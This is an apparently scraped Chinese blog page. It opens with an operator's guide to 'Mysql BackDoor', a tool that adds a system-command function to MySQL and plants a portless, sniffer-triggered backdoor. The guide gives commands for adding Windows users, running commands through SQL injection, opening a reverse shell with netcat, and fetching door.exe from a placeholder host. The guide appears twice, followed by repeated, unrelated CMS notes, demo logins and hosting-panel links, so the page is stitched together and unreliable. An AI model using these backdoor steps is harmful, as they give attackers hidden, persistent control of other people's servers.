1
2010/05/01 
09:08 
41293
Mysql BackDoor是一款针对PHP+Mysql服务器开发的后门,后门安装后为Mysql增加一个可以执行系统命令的"state"函数,并且随 Mysql进程启动一个基于Dll的嗅探型后门,从而巧妙地实现了无端口,无进程,无服务的穿墙安全.程序在WINXP、 WIN2003+MYSQL5.0.X下通过.
[安装]
将Mysql.php传到PHP服务器上,依填上相应的Host、User、Password、DB后,点击"自动安装Mysql BackDoor"
安装成功后,Mysql上便会增加一个"state"函数,同时利用Mysql进程运行一个基于嗅探的后门. 这个后门在Windows下拥有与Mysql一样的系统权限.
[使用state函数]
State函数实际是一个和PHP的”system()”功能相同的函数,可以用来执行系统命令.在”请输入SQL命令:”处填写要执行的mysql语 句,如” select state("net user nohack /add")”,点击”执行SQL语句”后,便会得到运行结果.
[使用基于Sniff的后门]
有了state函数,即使WebShell丢了,只要服务器上有SQL注入点,我们就能通过注入".php?id=1 and state('net user')"的方法在服务器上执行命令.但是如果注入点都没有了呢?我们仍然调用基于Sniff的后门控制服务器.向服务器开放的任意端口发送 以"Mysql-"开头的数据包,便能调用这个Sniff的后门,如:
1.运行系统命令: nc ip 80->回车->Mysql-cmd /c net user abc /add>c:/log.txt! (注意:最后的"!"不可省略)
2.让服务器反弹Shell到本机20082端口:先运行nc –lp 20082监听本机的20082端口,再nc ip 80->回车->Mysql-c-->回车
3.让服务器下载文件:nc ip 80->回车->Mysql-http://www.x.com/door.exe -c mydoor.exe! (注意:最后的"!"不可省略)
除了发送"Mysql-c-”,其他的命令是没有回显的,但相应的命令已经在服务器上运行了.
[安装]
将Mysql.php传到PHP服务器上,依填上相应的Host、User、Password、DB后,点击"自动安装Mysql BackDoor"
安装成功后,Mysql上便会增加一个"state"函数,同时利用Mysql进程运行一个基于嗅探的后门. 这个后门在Windows下拥有与Mysql一样的系统权限.
[使用state函数]
State函数实际是一个和PHP的”system()”功能相同的函数,可以用来执行系统命令.在”请输入SQL命令:”处填写要执行的mysql语 句,如” select state("net user nohack /add")”,点击”执行SQL语句”后,便会得到运行结果.
[使用基于Sniff的后门]
有了state函数,即使WebShell丢了,只要服务器上有SQL注入点,我们就能通过注入".php?id=1 and state('net user')"的方法在服务器上执行命令.但是如果注入点都没有了呢?我们仍然调用基于Sniff的后门控制服务器.向服务器开放的任意端口发送 以"Mysql-"开头的数据包,便能调用这个Sniff的后门,如:
1.运行系统命令: nc ip 80->回车->Mysql-cmd /c net user abc /add>c:/log.txt! (注意:最后的"!"不可省略)
2.让服务器反弹Shell到本机20082端口:先运行nc –lp 20082监听本机的20082端口,再nc ip 80->回车->Mysql-c-->回车
3.让服务器下载文件:nc ip 80->回车->Mysql-http://www.x.com/door.exe -c mydoor.exe! (注意:最后的"!"不可省略)
除了发送"Mysql-c-”,其他的命令是没有回显的,但相应的命令已经在服务器上运行了.
国外一些PHP+MYSQL的CMS非常优秀,在建英文网站的第一站、必经之路,本站整理后发布的,希望对您有帮助!
通过Alexa统计的几个主要的CMS(Content Management System)工具的最近三个月网站日浏览的统计,这份统计包括Drupal, Joomla, Mambo, Xoops 和 Typo3,很明显可以看出曾经的CMS老大Xoops已经式微,Mambo在变故之后半死不活,Typo3一直都名声平平(不知道Typo3与Typo是什么关系,Typo是基于Ruby on Rails(ROR)的blog系统,有着非常kool的ajax应用,正准备搭一个Typo看看)而相比较而言,Joomla与Drupal却变得越来越 popular,四月中的那次飞跃估计与Drupal的最终推出关系比较大。
当然这只是对于各个CMS的流行程度的一个估测值,会有这样那样的bias,譬如可能因为是Drupal的安装使用过于复杂所以用户才不断的到Drupal.org上去问问题,导致Drupal的网站页面访问上升,而Xoops因为发展历史很长,并且使用简单,所以用户在下载安装之后不用经常的去Xoops的网站寻求帮助(呵呵,GRE逻辑题)。但是不管怎样这份Alexa的Pageviews的统计还是能给我们指一指CMS 的流行风向。
----------------------------------
国外PHP CMS地址及演示地址
Drupal
官方网站:http://www.drupal.org/
演示地址:http://demo.opensourcecms.com/drupal/
管理登陆:http://demo.opensourcecms.com/drupal/
用 户 名:admin
密 码:demo
Joomla
官方网站:http://www.joomla.org/
演示地址:http://demo.opensourcecms.com/joomla/
管理登陆:http://demo.opensourcecms.com/joomla/administrator/
用 户 名:admin
密 码:demo
AIOCPPHP
官方网站:http://www.tecnick.com/
演示地址:http://demo.opensourcecms.com/aiocp/
管理登陆:http://demo.opensourcecms.com/aiocp/
用 户 名:admin
密 码:1234
BitWeaver
官方网站:http://www.bitweaver.org
演示地址:http://demo.opensourcecms.com/bitweaver
管理登陆:http://demo.opensourcecms.com/bitweaver/users/login.php
用 户 名:admin
密 码:demo
未完待续。。。。。。
通过Alexa统计的几个主要的CMS(Content Management System)工具的最近三个月网站日浏览的统计,这份统计包括Drupal, Joomla, Mambo, Xoops 和 Typo3,很明显可以看出曾经的CMS老大Xoops已经式微,Mambo在变故之后半死不活,Typo3一直都名声平平(不知道Typo3与Typo是什么关系,Typo是基于Ruby on Rails(ROR)的blog系统,有着非常kool的ajax应用,正准备搭一个Typo看看)而相比较而言,Joomla与Drupal却变得越来越 popular,四月中的那次飞跃估计与Drupal的最终推出关系比较大。
当然这只是对于各个CMS的流行程度的一个估测值,会有这样那样的bias,譬如可能因为是Drupal的安装使用过于复杂所以用户才不断的到Drupal.org上去问问题,导致Drupal的网站页面访问上升,而Xoops因为发展历史很长,并且使用简单,所以用户在下载安装之后不用经常的去Xoops的网站寻求帮助(呵呵,GRE逻辑题)。但是不管怎样这份Alexa的Pageviews的统计还是能给我们指一指CMS 的流行风向。
----------------------------------
国外PHP CMS地址及演示地址
Drupal
官方网站:http://www.drupal.org/
演示地址:http://demo.opensourcecms.com/drupal/
管理登陆:http://demo.opensourcecms.com/drupal/
用 户 名:admin
密 码:demo
Joomla
官方网站:http://www.joomla.org/
演示地址:http://demo.opensourcecms.com/joomla/
管理登陆:http://demo.opensourcecms.com/joomla/administrator/
用 户 名:admin
密 码:demo
AIOCPPHP
官方网站:http://www.tecnick.com/
演示地址:http://demo.opensourcecms.com/aiocp/
管理登陆:http://demo.opensourcecms.com/aiocp/
用 户 名:admin
密 码:1234
BitWeaver
官方网站:http://www.bitweaver.org
演示地址:http://demo.opensourcecms.com/bitweaver
管理登陆:http://demo.opensourcecms.com/bitweaver/users/login.php
用 户 名:admin
密 码:demo
未完待续。。。。。。
1. ZPanel - 在Windows下的免费Hosting Panel
网址:
http://sourceforge.net/projects/zpanel/
http://www.thezpanel.com/
中文讨论:
http://www.twftp.org/phpbb/viewtopic.php?t=3104
2. web-cp - *nix的虚拟主机管理
网址:
http://sourceforge.net/projects/webcp/
http://www.web-cp.net/
中文讨论:
http://www.twftp.org/phpbb/viewtopic.php?t=5095
3. VHCS - Virtual Hosting Control System
一样是*nix系统的,不过比ZPanel还热门喔
网址:
http://sourceforge.net/projects/vhcs/
http://www.vhcs.net/
4、webmin的虚拟主机管理模块virtualmin
webmin是一个可运行于Linux/freebsd的web界面的主机管理系统,本身自带以及有人贡献了不少模块
而virtualmin则是它的一个虚拟主机管理模块
webmin官方站: http://www.webmin.com/
virtaulmin站点: http://www.swelltech.com/virtualmin/
5、基于php/mysql的虚拟主机控制程序PHPMyWebHosting
PHPMyWebHosting是个开源的,基于php/mysql的虚拟主机控制面板程序,你可以用它建立带有邮箱,mysql支持的多域名虚拟主机,它须建立在Linux/freebsd之上,不支持windows。
网址:
http://sourceforge.net/projects/zpanel/
http://www.thezpanel.com/
中文讨论:
http://www.twftp.org/phpbb/viewtopic.php?t=3104
2. web-cp - *nix的虚拟主机管理
网址:
http://sourceforge.net/projects/webcp/
http://www.web-cp.net/
中文讨论:
http://www.twftp.org/phpbb/viewtopic.php?t=5095
3. VHCS - Virtual Hosting Control System
一样是*nix系统的,不过比ZPanel还热门喔
网址:
http://sourceforge.net/projects/vhcs/
http://www.vhcs.net/
4、webmin的虚拟主机管理模块virtualmin
webmin是一个可运行于Linux/freebsd的web界面的主机管理系统,本身自带以及有人贡献了不少模块
而virtualmin则是它的一个虚拟主机管理模块
webmin官方站: http://www.webmin.com/
virtaulmin站点: http://www.swelltech.com/virtualmin/
5、基于php/mysql的虚拟主机控制程序PHPMyWebHosting
PHPMyWebHosting是个开源的,基于php/mysql的虚拟主机控制面板程序,你可以用它建立带有邮箱,mysql支持的多域名虚拟主机,它须建立在Linux/freebsd之上,不支持windows。
一、软件准备:以下均为截止2006-1-20的最新正式版本,下载地址也均长期有效
1.PHP,推荐PHP4.4.0的ZIP解压版本:
PHP(4.4.0):http://cn.php.net/get/php-4.4.0-Win32.zip/from/a/mirror
PHP(5.1.2):http://cn.php.net/get/php-5.1.2-Win32.zip/from/a/mirror
开源的CMS基本上是php的天下
选择时主要看授权模式,不过很多人不关心这个
插件和模版的数量,开发社区是否活跃。有更多的人参与你才能源源不断地获得资源
中文的支持系统需求,支持那些数据库,这会影响对空间的选择
扩展性,不过不是所有的人都有能力和兴趣自己做扩展
选择时主要看授权模式,不过很多人不关心这个
插件和模版的数量,开发社区是否活跃。有更多的人参与你才能源源不断地获得资源
中文的支持系统需求,支持那些数据库,这会影响对空间的选择
扩展性,不过不是所有的人都有能力和兴趣自己做扩展
